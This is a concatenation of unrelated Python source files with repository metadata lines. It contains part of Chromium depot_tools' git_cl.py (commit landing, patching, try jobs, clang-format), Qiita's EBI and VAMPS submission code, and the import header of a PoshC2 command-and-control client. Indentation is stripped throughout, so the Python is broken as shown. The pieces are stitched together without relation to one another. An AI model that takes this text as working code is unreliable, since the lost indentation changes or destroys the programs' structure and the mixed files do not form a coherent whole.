pushed_to_pending = False
pending_ref = None
revision = None
try:
RunGit(['checkout', '-q', '-b', MERGE_BRANCH])
RunGit(['reset', '--soft', merge_base])
if options.contributor:
RunGit(
[
'commit', '--author', options.contributor,
'-m', commit_desc.description,
])
else:
RunGit(['commit', '-m', commit_desc.description])
if base_has_submodules:
cherry_pick_commit = RunGit(['rev-list', 'HEAD^!']).rstrip()
RunGit(['branch', CHERRY_PICK_BRANCH, svn_head])
RunGit(['checkout', CHERRY_PICK_BRANCH])
RunGit(['cherry-pick', cherry_pick_commit])
if cmd == 'land':
remote, branch = cl.FetchUpstreamTuple(cl.GetBranch())
pending_prefix = settings.GetPendingRefPrefix()
if not pending_prefix or branch.startswith(pending_prefix):
# If not using refs/pending/heads/* at all, or target ref is already set
# to pending, then push to the target ref directly.
retcode, output = RunGitWithCode(
['push', '--porcelain', remote, 'HEAD:%s' % branch])
pushed_to_pending = pending_prefix and branch.startswith(pending_prefix)
else:
# Cherry-pick the change on top of pending ref and then push it.
assert branch.startswith('refs/'), branch
assert pending_prefix[-1] == '/', pending_prefix
pending_ref = pending_prefix + branch[len('refs/'):]
retcode, output = PushToGitPending(remote, pending_ref, branch)
pushed_to_pending = (retcode == 0)
if retcode == 0:
revision = RunGit(['rev-parse', 'HEAD']).strip()
else:
# dcommit the merge branch.
cmd_args = [
'svn', 'dcommit',
'-C%s' % options.similarity,
'--no-rebase', '--rmdir',
]
if settings.GetForceHttpsCommitUrl():
# Allow forcing https commit URLs for some projects that don't allow
# committing to http URLs (like Google Code).
remote_url = cl.GetGitSvnRemoteUrl()
if urlparse.urlparse(remote_url).scheme == 'http':
remote_url = remote_url.replace('http://', 'https://')
cmd_args.append('--commit-url=%s' % remote_url)
_, output = RunGitWithCode(cmd_args)
if 'Committed r' in output:
revision = re.match(
'.*?\nCommitted r(\\d+)', output, re.DOTALL).group(1)
logging.debug(output)
finally:
# And then swap back to the original branch and clean up.
RunGit(['checkout', '-q', cl.GetBranch()])
RunGit(['branch', '-D', MERGE_BRANCH])
if base_has_submodules:
RunGit(['branch', '-D', CHERRY_PICK_BRANCH])
if not revision:
print 'Failed to push. If this persists, please file a bug.'
return 1
killed = False
if pushed_to_pending:
try:
revision = WaitForRealCommit(remote, revision, base_branch, branch)
# We set pushed_to_pending to False, since it made it all the way to the
# real ref.
pushed_to_pending = False
except KeyboardInterrupt:
killed = True
if cl.GetIssue():
to_pending = ' to pending queue' if pushed_to_pending else ''
viewvc_url = settings.GetViewVCUrl()
if not to_pending:
if viewvc_url and revision:
change_desc.append_footer(
'Committed: %s%s' % (viewvc_url, revision))
elif revision:
change_desc.append_footer('Committed: %s' % (revision,))
print ('Closing issue '
'(you may be prompted for your codereview password)...')
cl.UpdateDescription(change_desc.description)
cl.CloseIssue()
props = cl.GetIssueProperties()
patch_num = len(props['patchsets'])
comment = "Committed patchset #%d (id:%d)%s manually as %s" % (
patch_num, props['patchsets'][-1], to_pending, revision)
if options.bypass_hooks:
comment += ' (tree was closed).' if GetTreeStatus() == 'closed' else '.'
else:
comment += ' (presubmit successful).'
cl.RpcServer().add_comment(cl.GetIssue(), comment)
cl.SetIssue(None)
if pushed_to_pending:
_, branch = cl.FetchUpstreamTuple(cl.GetBranch())
print 'The commit is in the pending queue (%s).' % pending_ref
print (
'It will show up on %s in ~1 min, once it gets a Cr-Commit-Position '
'footer.' % branch)
hook = POSTUPSTREAM_HOOK_PATTERN % cmd
if os.path.isfile(hook):
RunCommand([hook, merge_base], error_ok=True)
return 1 if killed else 0
def WaitForRealCommit(remote, pushed_commit, local_base_ref, real_ref):
print
print 'Waiting for commit to be landed on %s...' % real_ref
print '(If you are impatient, you may Ctrl-C once without harm)'
target_tree = RunGit(['rev-parse', '%s:' % pushed_commit]).strip()
current_rev = RunGit(['rev-parse', local_base_ref]).strip()
loop = 0
while True:
sys.stdout.write('fetching (%d)... \r' % loop)
sys.stdout.flush()
loop += 1
RunGit(['retry', 'fetch', remote, real_ref], stderr=subprocess2.VOID)
to_rev = RunGit(['rev-parse', 'FETCH_HEAD']).strip()
commits = RunGit(['rev-list', '%s..%s' % (current_rev, to_rev)])
for commit in commits.splitlines():
if RunGit(['rev-parse', '%s:' % commit]).strip() == target_tree:
print 'Found commit on %s' % real_ref
return commit
current_rev = to_rev
def PushToGitPending(remote, pending_ref, upstream_ref):
"""Fetches pending_ref, cherry-picks current HEAD on top of it, pushes.
Returns:
(retcode of last operation, output log of last operation).
"""
assert pending_ref.startswith('refs/'), pending_ref
local_pending_ref = 'refs/git-cl/' + pending_ref[len('refs/'):]
cherry = RunGit(['rev-parse', 'HEAD']).strip()
code = 0
out = ''
max_attempts = 3
attempts_left = max_attempts
while attempts_left:
if attempts_left != max_attempts:
print 'Retrying, %d attempts left...' % (attempts_left - 1,)
attempts_left -= 1
# Fetch. Retry fetch errors.
print 'Fetching pending ref %s...' % pending_ref
code, out = RunGitWithCode(
['retry', 'fetch', remote, '+%s:%s' % (pending_ref, local_pending_ref)])
if code:
print 'Fetch failed with exit code %d.' % code
if out.strip():
print out.strip()
continue
# Try to cherry pick. Abort on merge conflicts.
print 'Cherry-picking commit on top of pending ref...'
RunGitWithCode(['checkout', local_pending_ref], suppress_stderr=True)
code, out = RunGitWithCode(['cherry-pick', cherry])
if code:
print (
'Your patch doesn\'t apply cleanly to ref \'%s\', '
'the following files have merge conflicts:' % pending_ref)
print RunGit(['diff', '--name-status', '--diff-filter=U']).strip()
print 'Please rebase your patch and try again.'
RunGitWithCode(['cherry-pick', '--abort'])
return code, out
# Applied cleanly, try to push now. Retry on error (flake or non-ff push).
print 'Pushing commit to %s... It can take a while.' % pending_ref
code, out = RunGitWithCode(
['retry', 'push', '--porcelain', remote, 'HEAD:%s' % pending_ref])
if code == 0:
# Success.
print 'Commit pushed to pending ref successfully!'
return code, out
print 'Push failed with exit code %d.' % code
if out.strip():
print out.strip()
if IsFatalPushFailure(out):
print (
'Fatal push error. Make sure your .netrc credentials and git '
'user.email are correct and you have push access to the repo.')
return code, out
print 'All attempts to push to pending ref failed.'
return code, out
def IsFatalPushFailure(push_stdout):
"""True if retrying push won't help."""
return '(prohibited by Gerrit)' in push_stdout
@subcommand.usage('[upstream branch to apply against]')
def CMDdcommit(parser, args):
"""Commits the current changelist via git-svn."""
if not settings.GetIsGitSvn():
message = """This doesn't appear to be an SVN repository.
If your project has a git mirror with an upstream SVN master, you probably need
to run 'git svn init', see your project's git mirror documentation.
If your project has a true writeable upstream repository, you probably want
to run 'git cl land' instead.
Choose wisely, if you get this wrong, your commit might appear to succeed but
will instead be silently ignored."""
print(message)
ask_for_data('[Press enter to dcommit or ctrl-C to quit]')
return SendUpstream(parser, args, 'dcommit')
@subcommand.usage('[upstream branch to apply against]')
def CMDland(parser, args):
"""Commits the current changelist via git."""
if settings.GetIsGitSvn():
print('This appears to be an SVN repository.')
print('Are you sure you didn\'t mean \'git cl dcommit\'?')
ask_for_data('[Press enter to push or ctrl-C to quit]')
return SendUpstream(parser, args, 'land')
@subcommand.usage('<patch url or issue id>')
def CMDpatch(parser, args):
"""Patches in a code review."""
parser.add_option('-b', dest='newbranch',
help='create a new branch off trunk for the patch')
parser.add_option('-f', '--force', action='store_true',
help='with -b, clobber any existing branch')
parser.add_option('-d', '--directory', action='store', metavar='DIR',
help='Change to the directory DIR immediately, '
'before doing anything else.')
parser.add_option('--reject', action='store_true',
help='failed patches spew .rej files rather than '
'attempting a 3-way merge')
parser.add_option('-n', '--no-commit', action='store_true', dest='nocommit',
help="don't commit after patch applies")
(options, args) = parser.parse_args(args)
if len(args) != 1:
parser.print_help()
return 1
issue_arg = args[0]
# TODO(maruel): Use apply_issue.py
# TODO(ukai): use gerrit-cherry-pick for gerrit repository?
if options.newbranch:
if options.force:
RunGit(['branch', '-D', options.newbranch],
stderr=subprocess2.PIPE, error_ok=True)
RunGit(['checkout', '-b', options.newbranch,
Changelist().GetUpstreamBranch()])
return PatchIssue(issue_arg, options.reject, options.nocommit,
options.directory)
def PatchIssue(issue_arg, reject, nocommit, directory):
if type(issue_arg) is int or issue_arg.isdigit():
# Input is an issue id. Figure out the URL.
issue = int(issue_arg)
cl = Changelist(issue=issue)
patchset = cl.GetMostRecentPatchset()
patch_data = cl.GetPatchSetDiff(issue, patchset)
else:
# Assume it's a URL to the patch. Default to https.
issue_url = gclient_utils.UpgradeToHttps(issue_arg)
match = re.match(r'.*?/issue(\d+)_(\d+).diff', issue_url)
if not match:
DieWithError('Must pass an issue ID or full URL for '
'\'Download raw patch set\'')
issue = int(match.group(1))
patchset = int(match.group(2))
patch_data = urllib2.urlopen(issue_arg).read()
# Switch up to the top-level directory, if necessary, in preparation for
# applying the patch.
top = settings.GetRelativeRoot()
if top:
os.chdir(top)
# Git patches have a/ at the beginning of source paths. We strip that out
# with a sed script rather than the -p flag to patch so we can feed either
# Git or svn-style patches into the same apply command.
# re.sub() should be used but flags=re.MULTILINE is only in python 2.7.
try:
patch_data = subprocess2.check_output(
['sed', '-e', 's|^--- a/|--- |; s|^+++ b/|+++ |'], stdin=patch_data)
except subprocess2.CalledProcessError:
DieWithError('Git patch mungling failed.')
logging.info(patch_data)
# We use "git apply" to apply the patch instead of "patch" so that we can
# pick up file adds.
# The --index flag means: also insert into the index (so we catch adds).
cmd = ['git', 'apply', '--index', '-p0']
if directory:
cmd.extend(('--directory', directory))
if reject:
cmd.append('--reject')
elif IsGitVersionAtLeast('1.7.12'):
cmd.append('--3way')
try:
subprocess2.check_call(cmd, env=GetNoGitPagerEnv(),
stdin=patch_data, stdout=subprocess2.VOID)
except subprocess2.CalledProcessError:
DieWithError('Failed to apply the patch')
# If we had an issue, commit the current state and register the issue.
if not nocommit:
RunGit(['commit', '-m', ('patch from issue %(i)s at patchset '
'%(p)s (http://crrev.com/%(i)s#ps%(p)s)'
% {'i': issue, 'p': patchset})])
cl = Changelist()
cl.SetIssue(issue)
cl.SetPatchset(patchset)
print "Committed patch locally."
else:
print "Patch applied to index."
return 0
def CMDrebase(parser, args):
"""Rebases current branch on top of svn repo."""
# Provide a wrapper for git svn rebase to help avoid accidental
# git svn dcommit.
# It's the only command that doesn't use parser at all since we just defer
# execution to git-svn.
return RunGitWithCode(['svn', 'rebase'] + args)[1]
def GetTreeStatus(url=None):
"""Fetches the tree status and returns either 'open', 'closed',
'unknown' or 'unset'."""
url = url or settings.GetTreeStatusUrl(error_ok=True)
if url:
status = urllib2.urlopen(url).read().lower()
if status.find('closed') != -1 or status == '0':
return 'closed'
elif status.find('open') != -1 or status == '1':
return 'open'
return 'unknown'
return 'unset'
def GetTreeStatusReason():
"""Fetches the tree status from a json url and returns the message
with the reason for the tree to be opened or closed."""
url = settings.GetTreeStatusUrl()
json_url = urlparse.urljoin(url, '/current?format=json')
connection = urllib2.urlopen(json_url)
status = json.loads(connection.read())
connection.close()
return status['message']
def GetBuilderMaster(bot_list):
"""For a given builder, fetch the master from AE if available."""
map_url = 'https://builders-map.appspot.com/'
try:
master_map = json.load(urllib2.urlopen(map_url))
except urllib2.URLError as e:
return None, ('Failed to fetch builder-to-master map from %s. Error: %s.' %
(map_url, e))
except ValueError as e:
return None, ('Invalid json string from %s. Error: %s.' % (map_url, e))
if not master_map:
return None, 'Failed to build master map.'
result_master = ''
for bot in bot_list:
builder = bot.split(':', 1)[0]
master_list = master_map.get(builder, [])
if not master_list:
return None, ('No matching master for builder %s.' % builder)
elif len(master_list) > 1:
return None, ('The builder name %s exists in multiple masters %s.' %
(builder, master_list))
else:
cur_master = master_list[0]
if not result_master:
result_master = cur_master
elif result_master != cur_master:
return None, 'The builders do not belong to the same master.'
return result_master, None
def CMDtree(parser, args):
"""Shows the status of the tree."""
_, args = parser.parse_args(args)
status = GetTreeStatus()
if 'unset' == status:
print 'You must configure your tree status URL by running "git cl config".'
return 2
print "The tree is %s" % status
print
print GetTreeStatusReason()
if status != 'open':
return 1
return 0
def CMDtry(parser, args):
"""Triggers a try job through Rietveld."""
group = optparse.OptionGroup(parser, "Try job options")
group.add_option(
"-b", "--bot", action="append",
help=("IMPORTANT: specify ONE builder per --bot flag. Use it multiple "
"times to specify multiple builders. ex: "
"'-b win_rel -b win_layout'. See "
"the try server waterfall for the builders name and the tests "
"available."))
group.add_option(
"-m", "--master", default='',
help=("Specify a try master where to run the tries."))
group.add_option(
"-r", "--revision",
help="Revision to use for the try job; default: the "
"revision will be determined by the try server; see "
"its waterfall for more info")
group.add_option(
"-c", "--clobber", action="store_true", default=False,
help="Force a clobber before building; e.g. don't do an "
"incremental build")
group.add_option(
"--project",
help="Override which project to use. Projects are defined "
"server-side to define what default bot set to use")
group.add_option(
"-n", "--name", help="Try job name; default to current branch name")
parser.add_option_group(group)
options, args = parser.parse_args(args)
if args:
parser.error('Unknown arguments: %s' % args)
cl = Changelist()
if not cl.GetIssue():
parser.error('Need to upload first')
props = cl.GetIssueProperties()
if props.get('closed'):
parser.error('Cannot send tryjobs for a closed CL')
if props.get('private'):
parser.error('Cannot use trybots with private issue')
if not options.name:
options.name = cl.GetBranch()
if options.bot and not options.master:
options.master, err_msg = GetBuilderMaster(options.bot)
if err_msg:
parser.error('Tryserver master cannot be found because: %s\n'
'Please manually specify the tryserver master'
', e.g. "-m tryserver.chromium.linux".' % err_msg)
def GetMasterMap():
# Process --bot.
if not options.bot:
change = cl.GetChange(cl.GetCommonAncestorWithUpstream(), None)
# Get try masters from PRESUBMIT.py files.
masters = presubmit_support.DoGetTryMasters(
change,
change.LocalPaths(),
settings.GetRoot(),
None,
None,
options.verbose,
sys.stdout)
if masters:
return masters
# Fall back to deprecated method: get try slaves from PRESUBMIT.py files.
options.bot = presubmit_support.DoGetTrySlaves(
change,
change.LocalPaths(),
settings.GetRoot(),
None,
None,
options.verbose,
sys.stdout)
if not options.bot:
parser.error('No default try builder to try, use --bot')
builders_and_tests = {}
# TODO(machenbach): The old style command-line options don't support
# multiple try masters yet.
old_style = filter(lambda x: isinstance(x, basestring), options.bot)
new_style = filter(lambda x: isinstance(x, tuple), options.bot)
for bot in old_style:
if ':' in bot:
parser.error('Specifying testfilter is no longer supported')
elif ',' in bot:
parser.error('Specify one bot per --bot flag')
else:
builders_and_tests.setdefault(bot, []).append('defaulttests')
for bot, tests in new_style:
builders_and_tests.setdefault(bot, []).extend(tests)
# Return a master map with one master to be backwards compatible. The
# master name defaults to an empty string, which will cause the master
# not to be set on rietveld (deprecated).
return {options.master: builders_and_tests}
masters = GetMasterMap()
for builders in masters.itervalues():
if any('triggered' in b for b in builders):
print >> sys.stderr, (
'ERROR You are trying to send a job to a triggered bot. This type of'
' bot requires an\ninitial job from a parent (usually a builder). '
'Instead send your job to the parent.\n'
'Bot list: %s' % builders)
return 1
patchset = cl.GetMostRecentPatchset()
if patchset and patchset != cl.GetPatchset():
print(
'\nWARNING Mismatch between local config and server. Did a previous '
'upload fail?\ngit-cl try always uses latest patchset from rietveld. '
'Continuing using\npatchset %s.\n' % patchset)
try:
cl.RpcServer().trigger_distributed_try_jobs(
cl.GetIssue(), patchset, options.name, options.clobber,
options.revision, masters)
except urllib2.HTTPError, e:
if e.code == 404:
print('404 from rietveld; '
'did you mean to use "git try" instead of "git cl try"?')
return 1
print('Tried jobs on:')
for (master, builders) in masters.iteritems():
if master:
print 'Master: %s' % master
length = max(len(builder) for builder in builders)
for builder in sorted(builders):
print ' %*s: %s' % (length, builder, ','.join(builders[builder]))
return 0
@subcommand.usage('[new upstream branch]')
def CMDupstream(parser, args):
"""Prints or sets the name of the upstream branch, if any."""
_, args = parser.parse_args(args)
if len(args) > 1:
parser.error('Unrecognized args: %s' % ' '.join(args))
cl = Changelist()
if args:
# One arg means set upstream branch.
branch = cl.GetBranch()
RunGit(['branch', '--set-upstream', branch, args[0]])
cl = Changelist()
print "Upstream branch set to " + cl.GetUpstreamBranch()
# Clear configured merge-base, if there is one.
git_common.remove_merge_base(branch)
else:
print cl.GetUpstreamBranch()
return 0
def CMDweb(parser, args):
"""Opens the current CL in the web browser."""
_, args = parser.parse_args(args)
if args:
parser.error('Unrecognized args: %s' % ' '.join(args))
issue_url = Changelist().GetIssueURL()
if not issue_url:
print >> sys.stderr, 'ERROR No issue to open'
return 1
webbrowser.open(issue_url)
return 0
def CMDset_commit(parser, args):
"""Sets the commit bit to trigger the Commit Queue."""
_, args = parser.parse_args(args)
if args:
parser.error('Unrecognized args: %s' % ' '.join(args))
cl = Changelist()
props = cl.GetIssueProperties()
if props.get('private'):
parser.error('Cannot set commit on private issue')
cl.SetFlag('commit', '1')
return 0
def CMDset_close(parser, args):
"""Closes the issue."""
_, args = parser.parse_args(args)
if args:
parser.error('Unrecognized args: %s' % ' '.join(args))
cl = Changelist()
# Ensure there actually is an issue to close.
cl.GetDescription()
cl.CloseIssue()
return 0
def CMDdiff(parser, args):
"""shows differences between local tree and last upload."""
cl = Changelist()
issue = cl.GetIssue()
branch = cl.GetBranch()
if not issue:
DieWithError('No issue found for current branch (%s)' % branch)
TMP_BRANCH = 'git-cl-diff'
base_branch = cl.GetCommonAncestorWithUpstream()
# Create a new branch based on the merge-base
RunGit(['checkout', '-q', '-b', TMP_BRANCH, base_branch])
try:
# Patch in the latest changes from rietveld.
rtn = PatchIssue(issue, False, False, None)
if rtn != 0:
return rtn
# Switch back to starting branch and diff against the temporary
# branch containing the latest rietveld patch.
subprocess2.check_call(['git', 'diff', TMP_BRANCH, branch, '--'])
finally:
RunGit(['checkout', '-q', branch])
RunGit(['branch', '-D', TMP_BRANCH])
return 0
def CMDowners(parser, args):
"""interactively find the owners for reviewing"""
parser.add_option(
'--no-color',
action='store_true',
help='Use this option to disable color output')
options, args = parser.parse_args(args)
author = RunGit(['config', 'user.email']).strip() or None
cl = Changelist()
if args:
if len(args) > 1:
parser.error('Unknown args')
base_branch = args[0]
else:
# Default to diffing against the common ancestor of the upstream branch.
base_branch = cl.GetCommonAncestorWithUpstream()
change = cl.GetChange(base_branch, None)
return owners_finder.OwnersFinder(
[f.LocalPath() for f in
cl.GetChange(base_branch, None).AffectedFiles()],
change.RepositoryRoot(), author,
fopen=file, os_path=os.path, glob=glob.glob,
disable_color=options.no_color).run()
@subcommand.usage('[files or directories to diff]')
def CMDformat(parser, args):
"""Runs clang-format on the diff."""
CLANG_EXTS = ['.cc', '.cpp', '.h', '.mm', '.proto', '.java']
parser.add_option('--full', action='store_true',
help='Reformat the full content of all touched files')
parser.add_option('--dry-run', action='store_true',
help='Don\'t modify any file on disk.')
parser.add_option('--diff', action='store_true',
help='Print diff to stdout rather than modifying files.')
opts, args = parser.parse_args(args)
# git diff generates paths against the root of the repository. Change
# to that directory so clang-format can find files even within subdirs.
rel_base_path = settings.GetRelativeRoot()
if rel_base_path:
os.chdir(rel_base_path)
# Generate diff for the current branch's changes.
diff_cmd = ['diff', '--no-ext-diff', '--no-prefix']
if opts.full:
# Only list the names of modified files.
diff_cmd.append('--name-only')
else:
# Only generate context-less patches.
diff_cmd.append('-U0')
# Grab the merge-base commit, i.e. the upstream commit of the current
# branch when it was created or the last time it was rebased. This is
# to cover the case where the user may have called "git fetch origin",
# moving the origin branch to a newer commit, but hasn't rebased yet.
upstream_commit = None
cl = Changelist()
upstream_branch = cl.GetUpstreamBranch()
if upstream_branch:
upstream_commit = RunGit(['merge-base', 'HEAD', upstream_branch])
upstream_commit = upstream_commit.strip()
if not upstream_commit:
DieWithError('Could not find base commit for this branch. '
'Are you in detached state?')
diff_cmd.append(upstream_commit)
# Handle source file filtering.
diff_cmd.append('--')
if args:
for arg in args:
if os.path.isdir(arg):
diff_cmd += [os.path.join(arg, '*' + ext) for ext in CLANG_EXTS]
elif os.path.isfile(arg):
diff_cmd.append(arg)
else:
DieWithError('Argument "%s" is not a file or a directory' % arg)
else:
diff_cmd += ['*' + ext for ext in CLANG_EXTS]
diff_output = RunGit(diff_cmd)
top_dir = os.path.normpath(
RunGit(["rev-parse", "--show-toplevel"]).rstrip('\n'))
# Locate the clang-format binary in the checkout
try:
clang_format_tool = clang_format.FindClangFormatToolInChromiumTree()
except clang_format.NotFoundError, e:
DieWithError(e)
if opts.full:
# diff_output is a list of files to send to clang-format.
files = diff_output.splitlines()
if not files:
print "Nothing to format."
return 0
cmd = [clang_format_tool]
if not opts.dry_run and not opts.diff:
cmd.append('-i')
stdout = RunCommand(cmd + files, cwd=top_dir)
if opts.diff:
sys.stdout.write(stdout)
else:
env = os.environ.copy()
env['PATH'] = str(os.path.dirname(clang_format_tool))
# diff_output is a patch to send to clang-format-diff.py
try:
script = clang_format.FindClangFormatScriptInChromiumTree(
'clang-format-diff.py')
except clang_format.NotFoundError, e:
DieWithError(e)
cmd = [sys.executable, script, '-p0']
if not opts.dry_run and not opts.diff:
cmd.append('-i')
stdout = RunCommand(cmd, stdin=diff_output, cwd=top_dir, env=env)
if opts.diff:
sys.stdout.write(stdout)
if opts.dry_run and len(stdout) > 0:
return 2
return 0
def CMDlol(parser, args):
# This command is intentionally undocumented.
print zlib.decompress(base64.b64decode(
'eNptkLEOwyAMRHe+wupCIqW57v0Vq84WqWtXyrcXnCBsmgMJ+/SSAxMZgRB6NzE'
'E2ObgCKJooYdu4uAQVffUEoE1sRQLxAcqzd7uK2gmStrll1ucV3uZyaY5sXyDd9'
'JAnN+lAXsOMJ90GANAi43mq5/VeeacylKVgi8o6F1SC63FxnagHfJUTfUYdCR/W'
'Ofe+0dHL7PicpytKP750Fh1q2qnLVof4w8OZWNY'))
return 0
class OptionParser(optparse.OptionParser):
"""Creates the option parse and add --verbose support."""
def __init__(self, *args, **kwargs):
optparse.OptionParser.__init__(
self, *args, prog='git cl', version=__version__, **kwargs)
self.add_option(
'-v', '--verbose', action='count', default=0,
help='Use 2 times for more debugging info')
def parse_args(self, args=None, values=None):
options, args = optparse.OptionParser.parse_args(self, args, values)
levels = [logging.WARNING, logging.INFO, logging.DEBUG]
logging.basicConfig(level=levels[min(options.verbose, len(levels) - 1)])
return options, args
def main(argv):
if sys.hexversion < 0x02060000:
print >> sys.stderr, (
'\nYour python version %s is unsupported, please upgrade.\n' %
sys.version.split(' ', 1)[0])
return 2
# Reload settings.
global settings
settings = Settings()
colorize_CMDstatus_doc()
dispatcher = subcommand.CommandDispatcher(__name__)
try:
return dispatcher.execute(OptionParser(), argv)
except urllib2.HTTPError, e:
if e.code != 500:
raise
DieWithError(
('AppEngine is misbehaving and returned HTTP %d, again. Keep faith '
'and retry or visit go/isgaeup.\n%s') % (e.code, str(e)))
if __name__ == '__main__':
# These affect sys.stdout so do it outside of main() to simplify mocks in
# unit testing.
fix_encoding.fix_encoding()
colorama.init()
sys.exit(main(sys.argv[1:]))
|
xuyuhan/depot_tools
|
git_cl.py
|
Python
|
bsd-3-clause
| 106,464
|
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from os.path import join, isdir
from shutil import rmtree
from tarfile import open as taropen
from tempfile import mkdtemp
from os import environ
from traceback import format_exc
from moi.job import system_call
from qiita_db.artifact import Artifact
from qiita_db.logger import LogEntry
from qiita_core.qiita_settings import qiita_config
from qiita_ware.ebi import EBISubmission
from qiita_ware.exceptions import ComputeError, EBISubmissionError
def submit_EBI(preprocessed_data_id, action, send):
"""Submit a preprocessed data to EBI
Parameters
----------
preprocessed_data_id : int
The preprocesssed data id
action : %s
The action to perform with this data
send : bool
True to actually send the files
"""
# step 1: init and validate
ebi_submission = EBISubmission(preprocessed_data_id, action)
# step 2: generate demux fastq files
ebi_submission.study.ebi_submission_status = 'submitting'
try:
ebi_submission.generate_demultiplexed_fastq()
except:
error_msg = format_exc()
if isdir(ebi_submission.full_ebi_dir):
rmtree(ebi_submission.full_ebi_dir)
ebi_submission.study.ebi_submission_status = 'failed: %s' % error_msg
LogEntry.create('Runtime', error_msg,
info={'ebi_submission': preprocessed_data_id})
raise
# step 3: generate and write xml files
ebi_submission.generate_xml_files()
if send:
# step 4: sending sequences
if action != 'MODIFY':
old_ascp_pass = environ.get('ASPERA_SCP_PASS', '')
environ['ASPERA_SCP_PASS'] = qiita_config.ebi_seq_xfer_pass
LogEntry.create('Runtime',
("Submitting sequences for pre_processed_id: "
"%d" % preprocessed_data_id))
try:
for cmd in ebi_submission.generate_send_sequences_cmd():
try:
stdout, stderr, _ = system_call(cmd)
except Exception as e:
stdout = ''
stderr = str(e)
le = LogEntry.create(
'Fatal', "Command: %s\nError: %s\n" % (cmd,
str(e)),
info={'ebi_submission': preprocessed_data_id})
ebi_submission.study.ebi_submission_status = (
"failed: ASCP submission, log id: %d" % le.id)
raise ComputeError("EBI Submission failed! Log id: "
"%d" % le.id)
finally:
open(ebi_submission.ascp_reply, 'a').write(
'stdout:\n%s\n\nstderr: %s' % (stdout, stderr))
finally:
environ['ASPERA_SCP_PASS'] = old_ascp_pass
LogEntry.create('Runtime',
('Submission of sequences of pre_processed_id: '
'%d completed successfully' %
preprocessed_data_id))
# step 5: sending xml and parsing answer
xmls_cmds = ebi_submission.generate_curl_command()
LogEntry.create('Runtime',
("Submitting XMLs for pre_processed_id: "
"%d" % preprocessed_data_id))
try:
xml_content, stderr, _ = system_call(xmls_cmds)
except Exception as e:
xml_content = ''
stderr = str(e)
le = LogEntry.create(
'Fatal', "Command: %s\nError: %s\n" % (cmd, str(e)),
info={'ebi_submission': preprocessed_data_id})
ebi_submission.study.ebi_submission_status = (
"failed: XML submission, log id: %d" % le.id)
raise ComputeError("EBI Submission failed! Log id: %d" % le.id)
else:
LogEntry.create('Runtime',
('Submission of sequences of pre_processed_id: '
'%d completed successfully' %
preprocessed_data_id))
finally:
open(ebi_submission.curl_reply, 'w').write(
'stdout:\n%s\n\nstderr: %s' % (xml_content, stderr))
try:
st_acc, sa_acc, bio_acc, ex_acc, run_acc = \
ebi_submission.parse_EBI_reply(xml_content)
except EBISubmissionError as e:
le = LogEntry.create(
'Fatal', "Command: %s\nError: %s\n" % (xml_content, str(e)),
info={'ebi_submission': preprocessed_data_id})
ebi_submission.study.ebi_submission_status = (
"failed: XML parsing, log id: %d" % le.id)
raise ComputeError("EBI Submission failed! Log id: %d" % le.id)
ebi_submission.study.ebi_submission_status = 'submitted'
if action == 'ADD':
if st_acc:
ebi_submission.study.ebi_study_accession = st_acc
if sa_acc:
ebi_submission.sample_template.ebi_sample_accessions = sa_acc
if bio_acc:
ebi_submission.sample_template.biosample_accessions = bio_acc
if ex_acc:
ebi_submission.prep_template.ebi_experiment_accessions = ex_acc
ebi_submission.artifact.ebi_run_accessions = run_acc
else:
st_acc, sa_acc, bio_acc, ex_acc, run_acc = None, None, None, None, None
return st_acc, sa_acc, bio_acc, ex_acc, run_acc
def submit_VAMPS(artifact_id):
"""Submit artifact to VAMPS
Parameters
----------
artifact_id : int
The artifact id
Raises
------
ComputeError
- If the artifact cannot be submitted to VAMPS
- If the artifact is associated with more than one prep template
"""
artifact = Artifact(artifact_id)
if not artifact.can_be_submitted_to_vamps:
raise ComputeError("Artifact %d cannot be submitted to VAMPS"
% artifact_id)
study = artifact.study
sample_template = study.sample_template
prep_templates = artifact.prep_templates
if len(prep_templates) > 1:
raise ComputeError(
"Multiple prep templates associated with the artifact: %s"
% artifact_id)
prep_template = prep_templates[0]
# Also need to check that is not submitting (see item in #1523)
if artifact.is_submitted_to_vamps:
raise ValueError("Cannot resubmit artifact %s to VAMPS!" % artifact_id)
# Generating a tgz
targz_folder = mkdtemp(prefix=qiita_config.working_dir)
targz_fp = join(targz_folder, '%d_%d_%d.tgz' % (study.id,
prep_template.id,
artifact_id))
targz = taropen(targz_fp, mode='w:gz')
# adding sample/prep
samp_fp = join(targz_folder, 'sample_metadata.txt')
sample_template.to_file(samp_fp)
targz.add(samp_fp, arcname='sample_metadata.txt')
prep_fp = join(targz_folder, 'prep_metadata.txt')
prep_template.to_file(prep_fp)
targz.add(prep_fp, arcname='prep_metadata.txt')
# adding preprocessed data
for _, fp, fp_type in artifact.filepaths:
if fp_type == 'preprocessed_fasta':
targz.add(fp, arcname='preprocessed_fasta.fna')
targz.close()
# submitting
cmd = ("curl -F user=%s -F pass='%s' -F uploadFile=@%s -F "
"press=UploadFile %s" % (qiita_config.vamps_user,
qiita_config.vamps_pass,
targz_fp,
qiita_config.vamps_url))
obs, _, _ = system_call(cmd)
exp = ("<html>\n<head>\n<title>Process Uploaded File</title>\n</head>\n"
"<body>\n</body>\n</html>")
if obs != exp:
return False
else:
artifact.is_submitted_to_vamps = True
return True
|
squirrelo/qiita
|
qiita_ware/commands.py
|
Python
|
bsd-3-clause
| 8,365
|
import base64, re, traceback, os, string, subprocess
from prompt_toolkit import PromptSession
from prompt_toolkit.history import FileHistory
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from prompt_toolkit.styles import Style
from poshc2.client.Alias import cs_alias, cs_replace
from poshc2.Colours import Colours
from poshc2.server.AutoLoads import check_module_loaded, run_autoloads_sharp
from poshc2.client.Help import sharp_help, allhelp
from poshc2.server.Config import PoshInstallDirectory, PoshProjectDirectory, SocksHost, PayloadsDirectory, ModulesDirectory
from poshc2.server.Config import PayloadCommsHost, DomainFrontHeader, UserAgent, PBindPipeName, PBindSecret, FCommFileName
from poshc2.Utils import argp, load_file, gen_key, get_first_url, get_first_dfheader
from poshc2.server.Core import print_bad, print_good
from poshc2.client.cli.CommandPromptCompleter import FilePathCompleter
from poshc2.server.payloads.Payloads import Payloads
from poshc2.server.PowerStatus import getpowerstatus
from poshc2.server.database.DB import new_task, kill_implant, get_implantdetails, get_sharpurls, get_baseenckey, get_powerstatusbyrandomuri
from poshc2.server.database.DB import select_item, update_label, get_allurls, get_c2server_all, get_newimplanturl, new_urldetails
